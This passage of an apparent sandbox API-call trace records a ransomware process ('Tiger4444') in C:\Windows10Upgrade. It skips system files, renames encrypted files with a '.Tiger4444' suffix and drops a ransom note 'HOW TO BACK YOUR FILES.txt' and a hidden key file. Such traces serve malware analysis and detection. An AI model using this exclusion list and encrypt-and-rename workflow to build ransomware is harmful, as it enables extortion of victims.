(lpString1="WinREBootApp32.exe", lpString2="windows") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="bootmgr") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="pagefile.sys") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="boot") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="ids.txt") returned 1 [0041.124] lstrcmpiW (lpString1="WinREBootApp32.exe", lpString2="NTUSER.DAT") returned 1 [0041.124] lstrcpyW (in: lpString1=0x30aead0, lpString2="WinREBootApp32.exe" | out: lpString1="WinREBootApp32.exe") returned="WinREBootApp32.exe" [0041.124] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe", dwFileAttributes=0x0) returned 1 [0041.125] lstrlenW (lpString="WinREBootApp32.exe") returned 18 [0041.125] lstrlenW (lpString="Tiger4444") returned 9 [0041.125] lstrcmpiW (lpString1="App32.exe", lpString2="Tiger4444") returned -1 [0041.125] lstrlenW (lpString=".dll") returned 4 [0041.125] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0041.125] lstrlenW (lpString=".lnk") returned 4 [0041.125] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0041.125] lstrlenW (lpString=".ini") returned 4 [0041.125] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0041.126] lstrlenW (lpString=".sys") returned 4 [0041.126] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0041.126] CreateFileW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe" (normalized: "c:\\windows10upgrade\\winrebootapp32.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0041.126] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.126] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13257884739) returned 1 [0041.126] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=25288) returned 1 [0041.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0041.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0041.127] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x65d0, lpName=0x0) returned 0x2cc [0041.141] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x65d0) returned 0xc20000 [0041.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0041.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0041.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0041.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0041.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0041.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0041.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0041.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0041.174] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13262712670) returned 1 [0041.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0041.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0041.174] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0041.175] CloseHandle (hObject=0x2cc) returned 1 [0041.175] CloseHandle (hObject=0x2c8) returned 1 [0041.177] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\WinREBootApp32.exe.Tiger4444") returned 48 [0041.177] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe" (normalized: "c:\\windows10upgrade\\winrebootapp32.exe"), lpNewFileName="C:\\Windows10Upgrade\\WinREBootApp32.exe.Tiger4444" (normalized: "c:\\windows10upgrade\\winrebootapp32.exe.tiger4444"), dwFlags=0x1) returned 1 [0041.186] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=25296 | out: Addend=0xc6f980) returned 3171344 [0041.186] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=48 | out: Addend=0xc6f98c) returned 2105 [0041.186] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6528e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6528e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x64c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinREBootApp64.exe", cAlternateFileName="WINREB~2.EXE")) returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="Tiger4444.exe") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2=".") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="..") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="windows") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="bootmgr") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="pagefile.sys") returned 1 [0041.186] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="boot") returned 1 [0041.187] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="ids.txt") returned 1 [0041.187] lstrcmpiW (lpString1="WinREBootApp64.exe", lpString2="NTUSER.DAT") returned 1 [0041.187] lstrcpyW (in: lpString1=0x30aead0, lpString2="WinREBootApp64.exe" | out: lpString1="WinREBootApp64.exe") returned="WinREBootApp64.exe" [0041.187] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe", dwFileAttributes=0x0) returned 1 [0041.188] lstrlenW (lpString="WinREBootApp64.exe") returned 18 [0041.188] lstrlenW (lpString="Tiger4444") returned 9 [0041.188] lstrcmpiW (lpString1="App64.exe", lpString2="Tiger4444") returned -1 [0041.188] lstrlenW (lpString=".dll") returned 4 [0041.188] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0041.188] lstrlenW (lpString=".lnk") returned 4 [0041.188] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0041.188] lstrlenW (lpString=".ini") returned 4 [0041.188] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0041.189] lstrlenW (lpString=".sys") returned 4 [0041.189] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0041.189] CreateFileW (lpFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe" (normalized: "c:\\windows10upgrade\\winrebootapp64.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0041.189] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.189] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13264191699) returned 1 [0041.189] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=25800) returned 1 [0041.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0041.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0041.189] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x67d0, lpName=0x0) returned 0x2cc [0041.190] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x67d0) returned 0xc20000 [0041.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d350 [0041.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0041.220] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d350 | out: hHeap=0xc50000) returned 1 [0041.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0041.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc8c2d0 [0041.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0041.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8c2d0 | out: hHeap=0xc50000) returned 1 [0041.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0041.221] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13267385081) returned 1 [0041.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0041.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0041.221] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0041.221] CloseHandle (hObject=0x2cc) returned 1 [0041.221] CloseHandle (hObject=0x2c8) returned 1 [0041.223] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\WinREBootApp64.exe.Tiger4444") returned 48 [0041.223] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe" (normalized: "c:\\windows10upgrade\\winrebootapp64.exe"), lpNewFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe.Tiger4444" (normalized: "c:\\windows10upgrade\\winrebootapp64.exe.tiger4444"), dwFlags=0x1) returned 1 [0041.223] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=25808 | out: Addend=0xc6f980) returned 3196640 [0041.224] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=31 | out: Addend=0xc6f98c) returned 2153 [0041.224] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6528e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6528e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x64c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinREBootApp64.exe", cAlternateFileName="WINREB~2.EXE")) returned 0 [0041.224] FindClose (in: hFindFile=0xc72d08 | out: hFindFile=0xc72d08) returned 1 [0041.224] lstrcpyW (in: lpString1=0x30aead0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0041.224] CreateFileW (lpFileName="C:\\Windows10Upgrade\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0041.224] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0041.224] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc20000 [0041.225] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0041.225] CloseHandle (hObject=0x2c8) returned 1 [0041.225] CloseHandle (hObject=0x2ac) returned 1 [0041.226] GetCurrentThreadId () returned 0xfa8 [0041.226] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66628 [0041.226] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\resources", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources") returned="C:\\Windows10Upgrade\\resources" [0041.226] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc829b8 | out: hHeap=0xc50000) returned 1 [0041.226] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0041.226] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources" | out: lpString1="C:\\Windows10Upgrade\\resources") returned="C:\\Windows10Upgrade\\resources" [0041.226] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\") returned="C:\\Windows10Upgrade\\resources\\" [0041.226] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3" [0041.226] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0041.246] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0041.253] FlushFileBuffers (hFile=0x2ac) returned 1 [0041.256] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0041.256] CloseHandle (hObject=0x2ac) returned 1 [0041.257] lstrlenW (lpString="C:\\Windows10Upgrade\\resources") returned 29 [0041.257] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.257] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b3c1b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7d9a05dd, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0041.257] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.257] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.257] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0041.257] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.257] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b3c1b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7d9a05dd, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.257] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.257] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.257] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0041.257] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.257] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.258] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7d97a555, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7d97a555, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7d9c6898, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0041.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0041.258] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a5195, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea3a5195, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="amd64", cAlternateFileName="")) returned 1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="Tiger4444.exe") returned -1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2=".") returned 1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="..") returned 1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="windows") returned -1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="bootmgr") returned -1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="pagefile.sys") returned -1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="boot") returned -1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="ids.txt") returned -1 [0041.258] lstrcmpiW (lpString1="amd64", lpString2="NTUSER.DAT") returned -1 [0041.258] lstrcpyW (in: lpString1=0x30aeae4, lpString2="amd64" | out: lpString1="amd64") returned="amd64" [0041.258] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0041.258] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc7b2d8 [0041.258] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66548 | out: ListHead=0xc66828, ListEntry=0xc66548) returned 0xc66308 [0041.258] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a78b4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a78b4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xc981b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hwcompatShared.txt", cAlternateFileName="HWCOMP~1.TXT")) returned 1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="Tiger4444.exe") returned -1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2=".") returned 1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="..") returned 1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="windows") returned -1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="bootmgr") returned 1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="pagefile.sys") returned -1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="boot") returned 1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="ids.txt") returned -1 [0041.258] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="NTUSER.DAT") returned -1 [0041.258] lstrcpyW (in: lpString1=0x30aeae4, lpString2="hwcompatShared.txt" | out: lpString1="hwcompatShared.txt") returned="hwcompatShared.txt" [0041.258] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt", dwFileAttributes=0x0) returned 1 [0041.270] lstrlenW (lpString="hwcompatShared.txt") returned 18 [0041.270] lstrlenW (lpString="Tiger4444") returned 9 [0041.270] lstrcmpiW (lpString1="hared.txt", lpString2="Tiger4444") returned -1 [0041.270] lstrlenW (lpString=".dll") returned 4 [0041.270] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0041.270] lstrlenW (lpString=".lnk") returned 4 [0041.270] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0041.270] lstrlenW (lpString=".ini") returned 4 [0041.270] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0041.270] lstrlenW (lpString=".sys") returned 4 [0041.270] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0041.270] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0041.270] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.270] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13272327910) returned 1 [0041.270] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=825371) returned 1 [0041.270] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0041.270] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0041.270] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc9b20, lpName=0x0) returned 0x2cc [0041.271] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc9b20) returned 0x31b0000 [0041.390] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.390] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0041.390] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.390] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0041.390] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0041.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0041.391] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13284395100) returned 1 [0041.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0041.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0041.391] UnmapViewOfFile (lpBaseAddress=0x31b0000) returned 1 [0041.399] CloseHandle (hObject=0x2cc) returned 1 [0041.399] CloseHandle (hObject=0x2c8) returned 1 [0041.415] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt.Tiger4444") returned 58 [0041.415] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt.tiger4444"), dwFlags=0x1) returned 1 [0041.416] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=825376 | out: Addend=0xc6f980) returned 3222448 [0041.416] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=120 | out: Addend=0xc6f98c) returned 2184 [0041.416] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3a9fd3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b1515, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea3b1515, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i386", cAlternateFileName="")) returned 1 [0041.416] lstrcmpiW (lpString1="i386", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.416] lstrcmpiW (lpString1="i386", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.416] lstrcmpiW (lpString1="i386", lpString2="Tiger4444.exe") returned -1 [0041.416] lstrcmpiW (lpString1="i386", lpString2=".") returned 1 [0041.416] lstrcmpiW (lpString1="i386", lpString2="..") returned 1 [0041.416] lstrcmpiW (lpString1="i386", lpString2="windows") returned -1 [0041.417] lstrcmpiW (lpString1="i386", lpString2="bootmgr") returned 1 [0041.417] lstrcmpiW (lpString1="i386", lpString2="pagefile.sys") returned -1 [0041.417] lstrcmpiW (lpString1="i386", lpString2="boot") returned 1 [0041.417] lstrcmpiW (lpString1="i386", lpString2="ids.txt") returned -1 [0041.417] lstrcmpiW (lpString1="i386", lpString2="NTUSER.DAT") returned -1 [0041.417] lstrcpyW (in: lpString1=0x30aeae4, lpString2="i386" | out: lpString1="i386") returned="i386" [0041.417] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\i386" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0041.417] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\") returned="C:\\Windows10Upgrade\\resources\\i386\\" [0041.417] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" [0041.417] 